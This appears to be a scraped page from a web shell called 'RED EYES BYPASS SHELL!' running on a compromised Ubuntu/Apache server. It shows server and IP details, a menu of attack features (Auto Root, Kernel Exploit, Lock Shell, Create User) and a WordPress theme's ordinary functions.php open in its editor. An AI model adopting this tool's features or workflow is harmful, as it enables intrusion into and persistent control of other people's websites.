Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
sdgs /
wp-content /
themes /
greengrass /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
assets
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
parts
[ DIR ]
drwxr-xr-x
patterns
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
block-patterns.php
1.16
KB
-rwxr-xr-x
change_log.txt
83
B
-rwxr-xr-x
functions.php
2.87
KB
-rwxr-xr-x
license.txt
35.01
KB
-rwxr-xr-x
readme.txt
3.04
KB
-rwxr-xr-x
screenshot.png
165.84
KB
-rwxr-xr-x
style.css
12.9
KB
-rwxr-xr-x
theme.json
11.56
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : functions.php
<?php /** * Greengrass functions and definitions * * @package Greengrass */ if ( ! function_exists( 'greengrass_setup' ) ) : /** * Sets up theme defaults and registers support for various WordPress features. * * Note that this function is hooked into the after_setup_theme hook, which runs * before the init hook. The init hook is too late for some features, such as indicating * support post thumbnails. */ function greengrass_setup() { if ( ! isset( $content_width ) ) $content_width = 640; /* pixels */ load_theme_textdomain( 'greengrass', get_template_directory() . '/languages' ); add_theme_support( 'automatic-feed-links' ); add_theme_support( 'post-thumbnails' ); add_theme_support( 'title-tag' ); add_theme_support( 'custom-logo', array( 'height' => 240, 'width' => 240, 'flex-height' => true, ) ); add_theme_support( 'custom-background', array( 'default-color' => 'ffffff' ) ); // Add support for Block Styles. add_theme_support( 'wp-block-styles' ); // Add support for full and wide align images. add_theme_support( 'align-wide' ); add_filter('use_widgets_block_editor', '__return_false'); /* * Switch default core markup for search form, comment form, and comments * to output valid HTML5. */ add_theme_support( 'html5', array( 'comment-form', 'comment-list', 'gallery', 'caption', 'style', 'script', 'navigation-widgets', ) ); // Add support for responsive embedded content. add_theme_support( 'responsive-embeds' ); } endif; // greengrass_setup add_action( 'after_setup_theme', 'greengrass_setup' ); function greengrass_scripts() { wp_enqueue_style( 'greengrass-basic-style', get_stylesheet_uri() ); } add_action( 'wp_enqueue_scripts', 'greengrass_scripts' ); /** * Use front-page.php when Front page displays is set to a static page. * * * @param string $template front-page.php. * * @return string The template to be used: blank if is_home() is true (defaults to index.php), else $template. */ function greengrass_front_page_template( $template ) { return is_home() ? '' : $template; } add_filter( 'frontpage_template', 'greengrass_front_page_template' ); /* Redirect on theme activation */ add_action( 'admin_init', 'greengrass_theme_activation_redirect' ); /** * Redirect to "Install Plugins" page on activation */ function greengrass_theme_activation_redirect() { global $pagenow; if ( "themes.php" == $pagenow && is_admin() && isset( $_GET['activated'] ) ) { wp_redirect( esc_url_raw( add_query_arg( 'page', 'greengrass-theme', admin_url( 'themes.php' ) ) ) ); } } // Block Patterns. require get_template_directory() . '/block-patterns.php'; // Theme About Page require get_template_directory() . '/inc/about.php'; add_filter('use_widgets_block_editor', '__return_false');
Close